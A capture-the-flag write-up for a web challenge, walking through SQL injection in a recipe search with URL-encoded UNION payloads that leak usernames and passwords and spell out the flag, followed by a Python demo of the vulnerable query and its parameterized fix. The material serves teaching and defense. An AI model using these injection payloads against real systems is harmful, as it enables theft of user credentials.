Cooking Flask - author: bluecougar - web

WriteUp : Kolowy

No provided files for this challenge, just a link.

We only have a form to search recipes.

The first step is to trigger an error from the SQL search.

https://cooking.chal.cyberjousting.com/search?recipe_name=&description=&tags=%27%20OR%201=1%20--

This error tells us the backend database is SQLite3.

We can easily dump all recipes, but nothing of interest.

https://cooking.chal.cyberjousting.com/search?tags=%27%20OR%201=1%20)%20--

The next step is to dump the users table.

First we need the name of that table. With a UNION, we get an error:

sqlite3.OperationalError: no such table: users

After a few tests, we find the table is called user.

After more tests, we can leak the list of usernames:

https://cooking.chal.cyberjousting.com/search?recipe_name=&description=&tags=%27)%20UNION%20SELECT%20json_group_array(username),%20json_group_array(password),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username)%20FROM%20user%20--

The first user is admin, so let's get its password:

https://cooking.chal.cyberjousting.com/search?recipe_name=&description=&tags=%27)%20UNION%20SELECT%20json_group_array(username),%20json_group_array(password),%20json_group_array(password),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username)%20FROM%20user%20--

Input should be a valid date or datetime, invalid character in year [type=date_from_datetime_parsing, input_value='["byuctf{pl34s3_p4r4m3t3…xistheworst","gobyu84"]', input_type=str]

Now, using substr, we can read the password 20 characters per request:

https://cooking.chal.cyberjousting.com/search?recipe_name=&description=&tags=%27)%20UNION%20SELECT%20json_group_array(substr(password,%201,%2020)),%20json_group_array(password),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username),%20json_group_array(username)%20FROM%20user%20--

Input should be a valid integer, unable to parse string as an integer [type=int_parsing, input_value='["byuctf{pl34s3_p4r4m3",…xistheworst","gobyu84"]', input_type=str]

Input should be a valid integer, unable to parse string as an integer [type=int_parsing, input_value='["t3r1z3_y0ur_1nputs_4","",""]', input_type=str]

Input should be a valid integer, unable to parse string as an integer [type=int_parsing, input_value='["nd_h4sh_p4ssw0rds}","",""]', input_type=str]

byuctf{pl34s3_p4r4m3
t3r1z3_y0ur_1nputs_4
nd_h4sh_p4ssw0rds}
byuctf{pl34s3_p4r4m3t3r1z3_y0ur_1nputs_4nd_h4sh_p4ssw0rds}
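The root cause behind the UNION payloads above, shown as an added example that is not the challenge's own code: a reconstructed vulnerable search (the `tags IN ('...')` shape, the eight-column recipe table and the user rows are all assumptions) beside its parameterized fix, run against an in-memory SQLite database. The flag value is a placeholder.

```python
import json
import sqlite3

# Constructed in-memory schema (an assumption about the challenge's layout): a recipe
# table with eight columns, matching the eight UNION columns in the payloads, and a
# user table with plaintext passwords. The flag value is a placeholder.
SCHEMA = """
CREATE TABLE recipe (id INTEGER, name TEXT, description TEXT, tags TEXT,
                     prep_time INTEGER, cook_time INTEGER, servings INTEGER, created TEXT);
CREATE TABLE user (username TEXT, password TEXT);
INSERT INTO recipe VALUES (1, 'Soup', 'Warm and simple', 'winter', 10, 30, 4, '2024-01-01');
INSERT INTO user VALUES ('admin', 'byuctf{placeholder_flag}');
INSERT INTO user VALUES ('bob', 'hunter2');
"""

# The injection from the writeup, URL-decoded: close the quote and the IN (...) list,
# UNION one aggregated row from the user table, and comment out the trailing "')".
PAYLOAD = ("') UNION SELECT json_group_array(username), json_group_array(password), "
           "'', '', '', '', '', '' FROM user --")


def open_db():
    # Requires SQLite built with JSON support (built in by default since 3.38).
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, tags):
    # Hypothetical reconstruction of the flawed pattern: the tag is spliced into the SQL
    # text, so the quote and parenthesis in the payload become part of the statement.
    sql = f"SELECT * FROM recipe WHERE tags IN ('{tags}')"
    return conn.execute(sql).fetchall()


def search_parameterized(conn, tags):
    # Hardened form: the tag is bound as a parameter and is only ever compared as a
    # literal string, so the same payload matches nothing and leaks nothing.
    return conn.execute("SELECT * FROM recipe WHERE tags IN (?)", (tags,)).fetchall()


def leak_users(conn):
    # What the injected UNION row looks like to the caller: JSON arrays in columns 0 and 1,
    # which is exactly the text that later surfaced inside the validation error messages.
    rows = search_vulnerable(conn, PAYLOAD)
    usernames, passwords = json.loads(rows[0][0]), json.loads(rows[0][1])
    return dict(zip(usernames, passwords))


if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", leak_users(db))                       # every username and password
    print("parameterized:", search_parameterized(db, PAYLOAD))  # []
```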